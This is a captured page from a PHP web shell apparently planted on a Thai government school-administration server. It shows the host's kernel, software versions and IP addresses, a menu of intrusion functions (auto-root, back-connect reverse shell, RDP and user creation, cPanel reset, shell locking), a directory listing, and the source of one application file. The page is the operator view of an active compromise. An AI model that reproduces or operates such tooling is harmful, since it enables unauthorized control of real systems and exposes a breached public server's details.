Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
permission_bak1 /
[ HOME SHELL ]
Name
Size
Permission
Action
expand
[ DIR ]
drwxr-xr-x
fpdf
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
main
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
UPDATE SQL PERMISSION.SQL
783
B
-rw-r--r--
default.php
465
B
-rw-r--r--
index.php
258
B
-rw-r--r--
menu.php
4.75
KB
-rw-r--r--
menu_mobile.php
1.2
KB
-rw-r--r--
permission.php
8.38
KB
-rw-r--r--
permission2.php
7.58
KB
-rw-r--r--
set_grant_person.php
14.54
KB
-rw-r--r--
time_inc.php
4.73
KB
-rw-r--r--
year.php
9.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menu_mobile.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); $sql_permission = "select * from permission_permission where person_id='$_SESSION[login_user_id]'"; $dbquery_permission = mysqli_query($connect,$sql_permission); $result_permission = mysqli_fetch_array($dbquery_permission); if(!(isset($_SESSION['admin_permission']))){ $_SESSION['admin_permission']=""; } echo "<table width='100%' border='0' cellspacing='0' cellpadding='0'>"; echo "<tr bgcolor='#FFCC00'><td>"; echo "<ul id='nav' class='dropdown dropdown-horizontal'>"; echo "<li><a href='./'>รายการหลัก</a></li>"; if($_SESSION['login_status']<5){ echo "<li><a href='?option=permission&task=main/permission_main_mobile'>ของฉัน</a></li>"; echo "<li><a href='?option=permission&task=main/report_1_mobile'>วันนี้(ทั้งหมด)</a></li>"; } if(($_SESSION['login_status']>=12) and ($_SESSION['login_status']<=14)){ echo "<li><a href='?option=permission&task=main/permission_main_sch_mobile' class='dir'>ขออนุญาตไปราชการ</a></li>"; } echo "</ul>"; echo "</td></tr>"; echo "</table>"; ?>
Close